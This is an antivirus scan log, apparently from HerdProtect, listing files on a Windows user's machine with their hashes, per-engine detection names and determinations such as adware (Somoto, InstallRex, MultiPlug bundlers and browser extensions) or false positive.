- K7 Gateway Antivirus as Trojan (Undefined)
- NANO AntiVirus as Trojan.Win32.Agent.cruvhh (Undefined)
- F-Prot as W32/SomotoBetterInstaller.A (Adware)
- avast! as Win32:Somoto-F [PUP] (Adware)
- Clam AntiVirus as Adware.Somoto-1 (Adware)
- Kaspersky as not-a-virus:Downloader.NSIS.Agent (Adware)
- Bitdefender as Application.Bundler.Somoto.I (Undefined)
- Agnitum Outpost as PUA.Somoto (Adware)
- SUPERAntiSpyware as Adware.Somoto (Adware)
- Lavasoft Ad-Aware as Application.Bundler.Somoto.I (Undefined)
- Comodo Security as Application.Win32.Somoto.A (Adware)
- F-Secure as Application.Bundler.Somoto (Undefined)
- Dr.Web as Adware.Somoto.17 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- McAfee Web Gateway as Artemis (Undefined)
- Sophos as Somoto BetterInstaller (Adware)
- Avira AntiVirus as APPL/Somoto.Gen2 (Adware)
- Antiy Labs AVL as Trojan/Win32.Tgenic (Undefined)
- AhnLab V3 Security as Win-PUP/Somoto (Undefined)
- G Data as Application.Bundler.Somoto (Undefined)
- Vba32 AntiVirus as Signed-AdWare.BetterInternet.SomotoLtd (Adware)
- ESET NOD32 as Win32/Somoto (Undefined)
- AVG as AdInstaller.Somoto (Undefined)
- Qihoo 360 Security as Win32/Virus.Downloader.832 (Undefined)
- Reason Heuristics as Threat.Somoto.BetterInstaller.Installer (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\vlcmediaplayersetup.exe
Publisher:
Signer: Somoto Ltd.
MD5: 2ad04f5097a32f57aa2dbf7ab75a75ef
SHA-1: e34d5c2f12b11f986551803547bef99f15172b01
Created: 2012/10/31 19:02:10
Detections: 8
Determination: Adware
- Trend Micro House Call as TROJ_GEN.F47V0801 (Undefined)
- Clam AntiVirus as Win.Adware.BetterInstaller (Adware)
- SUPERAntiSpyware as Adware.Somoto (Adware)
- Sophos as Somoto BetterInstaller (Adware)
- Dr.Web as Adware.Somoto.8 (Adware)
- ESET NOD32 as Win32/Somoto (variant) (Undefined)
- Fortinet FortiGate as Riskware/Somoto.XA (Undefined)
- Reason Heuristics as Threat.Somoto.BetterInstaller.Installer (Adware)

ＨＰログ２

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\kirisame1.07\game.exe
Publisher:
MD5: bd9ebb7d09f9111a9f0a0ba2238eaf80
SHA-1: 28c753124d845f61373be87d392ab839914ebdc5
Created: 2012/06/22 21:45:22
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.KillAV.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\tyabandeath_v1_00\game.exe
Publisher:
MD5: bd9ebb7d09f9111a9f0a0ba2238eaf80
SHA-1: 28c753124d845f61373be87d392ab839914ebdc5
Created: 2014/02/26 22:54:32
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.KillAV.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\herdprotectscan_setup.exe
Publisher: Reason Company Software Inc.
Signer: Reason Software Company Inc.
MD5: 172ed33198484df87fa015b695eaad80
SHA-1: 1df2124a741afc2ee0b2e90e904a3201e5cb3c3d
Created: 2015/04/20 21:53:24
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.ArcadeWeb!6.727 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\otl.exe
Publisher: OldTimer Tools
MD5: 4adcfee16ee9978f06157634669d36fb
SHA-1: 30b37076552e49276836d02dd73d038c27dbbee9
Created: 2015/04/20 21:57:24
Detections: 2
Determination: Ignore detections (false positive)
- Agnitum Outpost as Packed/PECompact
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\amarecco310c\amv300i\setup.exe
Publisher:
MD5: 5bed35d2b0191e65542ca23dfccba973
SHA-1: 2e33d594bda79d346d685c303c9d4102c72fd4e7
Created: 2013/08/21 22:50:20
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\amarecco310c\verup106\ver106pach\bbb.exe
Publisher:
MD5: e77fdf2e781514d1174c4008ef78b3a2
SHA-1: 1a0b3afef96b5d7e271526089b9163dd378021c2
Created: 2013/07/27 16:00:36
Detections: 1
Determination: Ignore detections (false positive)
- Sunbelt AntiMalware as VIPRE.Suspicious (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\imoona_sample.exe
Publisher:
MD5: d0fbd1efc5b84eac16a5ed2dd5b9131d
SHA-1: 12d453da3c05368175146abec512e8ca83b51d79
Created: 2013/05/04 5:22:43
Detections: 3
Determination: UndefinedMalware
- Norman as Crypt.AUPI (Undefined)
- Antiy Labs AVL as Trojan/Win32.SGeneric (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\utorrent.exe
Publisher: BitTorrent, Inc.
Signer: BitTorrent Inc
MD5: 88155d3d23ca8a1dfb1f45ee3e4c8df8
SHA-1: 3176d4803e93f04fb2a4882d78ee4117650b8a32
Created: 2013/01/28 14:53:55
Detections: 3
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.Patched.gen (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Strictor.46875 (Undefined)
- Trend Micro House Call as HV_ZYX_BL132900.TOMC (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\sinyujk_tr.exe
Publisher:
MD5: 0bb00f13cd86d760029db95583c55e67
SHA-1: 570d8e0edc9a79a439adbc5594164b4a58fcfca2
Created: 2013/03/09 4:30:09
Detections: 3
Determination: Inconclusive
- Vba32 AntiVirus as Worm.Win32.Huhk.d (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0617 (Undefined)
- F-Secure as Adware.SwiftBrowse.CR (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin\dirlist.dll
Publisher:
MD5: 5e4df0c4cf4a8974e6d045abc7704bb1
SHA-1: bac1f1f0dd8de786c4c86ca5b5a2ae388432e956
Created: 2013/03/09 4:30:09
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/Downloader.VB.oxh (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin\lineparser.dll
Publisher:
MD5: 5d89819d0d2269d26afd342557a0d5e1
SHA-1: fba2656056babddf9502bd41b77a358b88c1a28a
Created: 2013/03/09 4:30:09
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.Ponmocup!6.C76 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\dolphin-3.5-x64\dolphin.exe
Publisher:
MD5: 1bd6602306992dedeff0cd5c17857829
SHA-1: f43cba8957d587115b5ab289bd79ce22a3701ca7
Created: 2013/01/27 5:35:47
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Backdoor.Win32.A.Hupigon.12871680 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\ｊｃ拉致監禁レイプ_体験版\jc拉致監禁レイプ_体験版.exe
Publisher:
MD5: 7f791283a04bb07427e4c95ed8a2e48a
SHA-1: efe9203c23a64a9e064dc0953eecf4c3ee251ca4
Created: 2013/06/19 15:25:05
Detections: 3
Determination: Inconclusive
- Vba32 AntiVirus as Worm.Win32.Huhk.d (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0617 (Undefined)
- F-Secure as Adware.SwiftBrowse.CR (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\kontrapunkt_trial\kontrapunkt.exe
Publisher:
MD5: 7ac08e61337710b6cc548ef69e01adbd
SHA-1: e573d690bd7f2395981d674aeda0a4ae76011b0b
Created: 2013/05/04 5:21:43
Detections: 1
Determination: UndefinedMalware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\amarectv300c\live_setup300.exe
Publisher:
MD5: fb824c501456ce3a522eb5b1f9bdfcc0
SHA-1: 40360972c5d766c4e39cc71d95aaca83e7337153
Created: 2013/10/28 16:39:11
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\amv300i\setup.exe
Publisher:
MD5: 5bed35d2b0191e65542ca23dfccba973
SHA-1: 2e33d594bda79d346d685c303c9d4102c72fd4e7
Created: 2013/10/28 16:41:34
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\aviutl100\aviutl.exe
Publisher:
MD5: de77065ce0fde0f0f8231cfe47a49c66
SHA-1: b83bd94f594a5b2ac585aba86931a8083415f36e
Created: 2014/02/14 23:52:36
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Part.a (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\chorokuf\chosche.exe
Publisher:
MD5: 315e1f3445df0fbaf397fd7c3d60feea
SHA-1: 54a2039918d2f79c0f377779bd3dd2fe5e62e696
Created: 2005/07/14 5:04:25
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Laneul (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: b189bd00021e72894cf77ccc95270710
SHA-1: cbf5d4259f866d75863a1c1c0f27b028b2ae1aee
Created: 2005/03/16 10:24:54
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\ib_1.05\ib_1.05.exe
Publisher:
MD5: fb8a6dffa0bcc42b7d5aefc37d87357f
SHA-1: ce08659427366a7d87557f1d9a8955f068811337
Created: 2013/10/28 16:33:24
Detections: 2
Determination: Inconclusive
- Sophos as Mal/EncPk-ACO (Undefined)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\l-smash_works_r708_plugin-set\vapoursynth\vslsmashsource.dll
Publisher:
MD5: 83cdfc7b169d9934766948e920fd5dc8
SHA-1: 86d75563cd89d441a2a5307b3e694b564aaed1f7
Created: 2014/02/14 23:53:58
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\l-smash_works_r708_plugin-set (1)\vapoursynth\vslsmashsource.dll
Publisher:
MD5: 83cdfc7b169d9934766948e920fd5dc8
SHA-1: 86d75563cd89d441a2a5307b3e694b564aaed1f7
Created: 2014/11/23 3:09:42
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\jabo_dinput.dll
Publisher: Project64
MD5: d5f798c360aaac128b0fc4a211688ccd
SHA-1: 4b55d92fda42f108bd0e22503afd905754e95caf
Created: 2014/11/13 21:58:44
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\jabo_direct3d8.dll
Publisher: Project64
MD5: ff57f60c58ede6364b980edcb311873b
SHA-1: 5ec6e231f780d9eafa6ee855e0f4968a7f8c347d
Created: 2014/11/13 21:58:44
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\nrage_dinput8_v2.dll
Publisher: Gbs
MD5: f5296ecc4d6ea5605291de9203032a82
SHA-1: 8e72558a56adb82f3ed939c39f67718a0068400e
Created: 2014/11/13 21:58:45
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Packed/Win32.Klone.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\rtpｾｯﾄｱｯﾌﾟ\rpg2000rtp.exe
Publisher: InstallShield Software Corporation
MD5: f745653bbee5ba9a6725a874a43386d5
SHA-1: f5ddcf5285ee5e4d663dceb059059dd2931cf9e3
Created: 2013/10/28 16:33:29
Detections: 1
Determination: Ignore detections (false positive)
- Comodo Security as Heur.Suspicious

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\黒先輩ver1.05\game.exe
Publisher:
MD5: c22b8d8acb738776d94ea0cc10277144
SHA-1: 4dcc713487826be8c67f614d0f90b0ab59d2215c
Created: 2014/04/30 16:01:29
Detections: 3
Determination: Inconclusive
- Bkav FE as W32.Clod248.Trojan (Undefined)
- The Hacker as Backdoor/SdBot.ysj (Undefined)
- ViRobot as Trojan.Win32.A.ShipUp.69632.M (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\ctregrun.exe
Publisher: Creative Technology Ltd
MD5: a8d72b3c7e20f2bb67cc60bcad4e9138
SHA-1: ec3ca8c41171fd9242e2411e6a571bd15f164e04
Created: 2012/10/31 18:21:39
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.CreativeTechnology.I

---------------------------------------------------------------------------------

File path: c:\windows\eiunin21.exe
Publisher: nobukichi
MD5: 7895ff5002fea700230af61b7defb12a
SHA-1: 54cb2c99d06bee335962b1aacb507bcf418f5948
Created: 2014/02/14 3:27:53
Detections: 2
Determination: Ignore detections (false positive)
- eSafe as Suspicious File
- Comodo Security as Heur.Packed.Unknown

---------------------------------------------------------------------------------

File path: c:\windows\frontier_1920x1080_ss.scr
Publisher: Jan Kolarik & Ondrej Vaverka
MD5: 7234fea58fe972e8d1b3d96dec67fbc5
SHA-1: 356a8ac6c80fe2fa4876f24ca849e547110d3bec
Created: 2012/10/31 9:10:21
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Heur.i

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\divx.dll
Publisher: DivX, Inc.
MD5: f42e95bfb193754e9148db6434d2e88e
SHA-1: f7e2bbebb5efee13b3c8df04d4983a089abf011d
Created: 2010/02/20 4:27:36
Detections: 1
Determination: Ignore detections (false positive)
- CMC Antivirus as Packed.Win32.PolyCrypt.2!O

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\dsnpstd.ax
Publisher:
MD5: 27190c5d44977ed9df049c0729efa3a1
SHA-1: e8b59166ee15db1beeaa9ca4bf9610ec10982234
Created: 2012/11/06 16:20:48
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan[Downloader]/Win32.Banload (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\ext-ms-win-cluster-clusapi-l1-1-1.dll
Publisher: Microsoft Corporation
MD5: 6f5557e3f97cb2a957da5dcdaf1e22c1
SHA-1: c2a27e776fbfc3666642425dcc5f2b34bb41cb10
Created: 2013/08/22 13:14:14
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Backdoor/Bifrose.fxu (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\kbdcherp.dll
Publisher: Microsoft Corporation
MD5: f992fe1d923f59f806442449f3ea557b
SHA-1: d216f5bc5d466c1c9d94aa57a28c5226b214bdbc
Created: 2013/08/22 13:15:06
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/Kryptik.ahcy (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\adobe\arm\reader_11.0.00\16129\adobearm.exe
Publisher: Adobe Systems Incorporated
Signer: Adobe Systems, Incorporated
MD5: 3cb07566302bceeb898de270a0bec175
SHA-1: 3c79cfc02e2e9877e164d1a7e856fa6bddb34c2f
Created: 2012/12/03 16:35:28
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.Sality!6.EDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\adobe\arm\reader_11.0.00\16129\adobearm.exe
Publisher: Adobe Systems Incorporated
Signer: Adobe Systems, Incorporated
MD5: 3cb07566302bceeb898de270a0bec175
SHA-1: 3c79cfc02e2e9877e164d1a7e856fa6bddb34c2f
Created: 2012/12/03 16:35:28
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.Sality!6.EDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\cjhlcgankhfaeohlngbhkhbnhmhaokmc\manifest.json
Publisher:
MD5: ebb718d9043c987b2a05265acfab9493
SHA-1: df01f0e262d5b287a78c4d7eadfe7ed7eadd9cd9
Created: 2015/02/25 17:39:32
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.UnIDealsi (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
Publisher: SoftWarehouse
MD5: 156e10be1df7468b247c4a6f629b1c9e
SHA-1: b84da289fa8bec345109ac49e4ec6754179efc49
Created: 2014/01/12 15:35:07
Detections: 24
Determination: Adware
- Bkav FE as W32.Clodd20.Trojan (Undefined)
- Trend Micro House Call as TROJ_GEN.R0CBH07A214 (Undefined)
- Kaspersky as not-a-virus:Downloader.Win32.AdLoad (Adware)
- IKARUS anti.virus as not-a-virus:Downloader.Win32.AdLoad (Adware)
- Baidu Antivirus as HackTool.Win32.AdLoad
- ESET NOD32 as Win32/InstalleRex (Undefined)
- Antiy Labs AVL as Downloader/Win32.AdLoad (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- McAfee as Artemis!484F9D098F42 (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- McAfee Web Gateway as Artemis!484F9D098F42 (Undefined)
- Sophos as Generic PUA AO (Undefined)
- NANO AntiVirus as Trojan.Win32.AntiFW.ctihds (Undefined)
- Agnitum Outpost as PUA.Downloader (Adware)
- Comodo Security as ApplicUnwnt.Win32.AdWare.InstallRex.VLD (Adware)
- Dr.Web as Adware.Downware.2108 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R0CBC0EAN14 (Undefined)
- Jiangmin as Trojan/AntiFW.a (Undefined)
- Vba32 AntiVirus as Downloader.AdLoad (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Fortinet FortiGate as Riskware/Adload (Undefined)
- AVG as Downloader.Generic13 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\setup.exe
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: e717f6ce3a7429bfa6d7f3cf66737a4b
SHA-1: 01f4042589b4ed88c351ffeac256be7a9d884818
Created: 2014/01/12 15:35:07
Detections: 2
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1
- Emsisoft Anti-Malware as Gen:Variant.Symmi.36268 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\tsudll.dll
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: af7ce801c8471c5cd19b366333c153c4
SHA-1: 4267749d020a362edbd25434ad65f98b073581f1
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as Downware.TSU (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\_setup.dll
Publisher:
MD5: d8bbf8e88cf9821dd260f2c41505344a
SHA-1: 4a527f16683c49f70f613ee2ed7185f164ff8df7
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as Trojan.Agent/Gen-Sefnit (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\neopleplugin\npneoplegameinstaller.dll
Publisher:
Signer: Neople Inc.
MD5: c3517e56484ee9a628e4d30553ee53cd
SHA-1: 395542a67a1c8304b1bbcd75ba737d90e3624b47
Created: 2014/01/21 0:49:30
Detections: 1
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0305 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\battle network rockman exe 3 black (japan) (v1.1).exe
Publisher:
MD5: 9fbf58ca57aed93ae81da013e20a1e02
SHA-1: d3c3ed674c540b48164f0d962a7e574e7d0be385
Created: 2014/02/25 17:39:09
Detections: 28
Determination: Adware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)
- Dr.Web as Trojan.DownLoader12.31680 (Undefined)
- F-Secure as Gen:Variant.Adware.Mikey (Adware)
- avast! as Win32:MultiPlug-WR [PUP] (Adware)
- McAfee as Program.MultiPlug-FXE (Adware)
- VIPRE Antivirus as Threat.5085665 (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FC application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Mikey.8516 (Adware)
- Norman as Gen:Variant.Adware.Strictor.61661 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Mikey.8516 (Adware)
- MicroWorld eScan as Gen:Variant.Adware.Mikey.8516 (Adware)
- Malwarebytes as PUP.Optional.Unizeto (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.213923 (Adware)
- NANO AntiVirus as Riskware.Win32.MultiPlug.dojkok (Adware)
- F-Prot as W32/S-fe152cf5 (Undefined)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Mikey.8516 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VA (Adware)
- McAfee Web Gateway as BehavesLike.Win32.MultiPlug.tc (Undefined)
- Jiangmin as AdWare/MultiPlug.dkxa (Adware)
- Avira AntiVirus as ADWARE/MultiPlug.Gen (Adware)
- Antiy Labs AVL as GrayWare[AdWare:not-a-virus]/Win32.MultiPlug (Adware)
- G Data as Gen:Variant.Adware.Mikey.8516 (Adware)
- Vba32 AntiVirus as SScope.Adware.MultiPlug (Adware)
- Rising Antivirus as PE:AdWare.Win32.MultiPlug.s!1075356738 (Adware)
- Fortinet FortiGate as Riskware/Badur (Undefined)
- AVG as Generic6 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
Publisher: SoftWarehouse
MD5: 156e10be1df7468b247c4a6f629b1c9e
SHA-1: b84da289fa8bec345109ac49e4ec6754179efc49
Created: 2014/01/12 15:35:07
Detections: 24
Determination: Adware
- Bkav FE as W32.Clodd20.Trojan (Undefined)
- Trend Micro House Call as TROJ_GEN.R0CBH07A214 (Undefined)
- Kaspersky as not-a-virus:Downloader.Win32.AdLoad (Adware)
- IKARUS anti.virus as not-a-virus:Downloader.Win32.AdLoad (Adware)
- Baidu Antivirus as HackTool.Win32.AdLoad
- ESET NOD32 as Win32/InstalleRex (Undefined)
- Antiy Labs AVL as Downloader/Win32.AdLoad (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- McAfee as Artemis!484F9D098F42 (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- McAfee Web Gateway as Artemis!484F9D098F42 (Undefined)
- Sophos as Generic PUA AO (Undefined)
- NANO AntiVirus as Trojan.Win32.AntiFW.ctihds (Undefined)
- Agnitum Outpost as PUA.Downloader (Adware)
- Comodo Security as ApplicUnwnt.Win32.AdWare.InstallRex.VLD (Adware)
- Dr.Web as Adware.Downware.2108 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R0CBC0EAN14 (Undefined)
- Jiangmin as Trojan/AntiFW.a (Undefined)
- Vba32 AntiVirus as Downloader.AdLoad (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Fortinet FortiGate as Riskware/Adload (Undefined)
- AVG as Downloader.Generic13 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\setup.exe
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: e717f6ce3a7429bfa6d7f3cf66737a4b
SHA-1: 01f4042589b4ed88c351ffeac256be7a9d884818
Created: 2014/01/12 15:35:07
Detections: 2
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1
- Emsisoft Anti-Malware as Gen:Variant.Symmi.36268 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\tsudll.dll
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: af7ce801c8471c5cd19b366333c153c4
SHA-1: 4267749d020a362edbd25434ad65f98b073581f1
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as Downware.TSU (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\_setup.dll
Publisher:
MD5: d8bbf8e88cf9821dd260f2c41505344a
SHA-1: 4a527f16683c49f70f613ee2ed7185f164ff8df7
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as Trojan.Agent/Gen-Sefnit (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\battle network rockman exe 3 black (japan) (v1.1).exe
Publisher:
MD5: 9fbf58ca57aed93ae81da013e20a1e02
SHA-1: d3c3ed674c540b48164f0d962a7e574e7d0be385
Created: 2014/02/25 17:39:09
Detections: 28
Determination: Adware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)
- Dr.Web as Trojan.DownLoader12.31680 (Undefined)
- F-Secure as Gen:Variant.Adware.Mikey (Adware)
- avast! as Win32:MultiPlug-WR [PUP] (Adware)
- McAfee as Program.MultiPlug-FXE (Adware)
- VIPRE Antivirus as Threat.5085665 (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FC application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Mikey.8516 (Adware)
- Norman as Gen:Variant.Adware.Strictor.61661 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Mikey.8516 (Adware)
- MicroWorld eScan as Gen:Variant.Adware.Mikey.8516 (Adware)
- Malwarebytes as PUP.Optional.Unizeto (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.213923 (Adware)
- NANO AntiVirus as Riskware.Win32.MultiPlug.dojkok (Adware)
- F-Prot as W32/S-fe152cf5 (Undefined)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Mikey.8516 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VA (Adware)
- McAfee Web Gateway as BehavesLike.Win32.MultiPlug.tc (Undefined)
- Jiangmin as AdWare/MultiPlug.dkxa (Adware)
- Avira AntiVirus as ADWARE/MultiPlug.Gen (Adware)
- Antiy Labs AVL as GrayWare[AdWare:not-a-virus]/Win32.MultiPlug (Adware)
- G Data as Gen:Variant.Adware.Mikey.8516 (Adware)
- Vba32 AntiVirus as SScope.Adware.MultiPlug (Adware)
- Rising Antivirus as PE:AdWare.Win32.MultiPlug.s!1075356738 (Adware)
- Fortinet FortiGate as Riskware/Badur (Undefined)
- AVG as Generic6 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0\manifest.json
Publisher:
MD5: e2832fbedae560495781610b5c511afa
SHA-1: 95f9c6fe1ea5a6ee009bce1e9c215ef53fb5c108
Created: 2014/01/12 15:34:11
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.WebPick.YoutubeAdblocker.ChromePlugin.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7\manifest.json
Publisher:
MD5: 2df44604a8b618be96a265130308516c
SHA-1: 8df8b294612d3e16cc381e101c5b9e35d5fa5013
Created: 2013/01/12 15:33:53
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.JustPlugIt.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127\manifest.json
Publisher:
MD5: 0d1242f2beff2a586e2da1ae64a85576
SHA-1: cdc4b635c3842fbd9716d699abe4acd00a2ed26c
Created: 2013/01/12 15:34:18
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.MailChecker (Adware)

---------------------------------------------------------------------------------

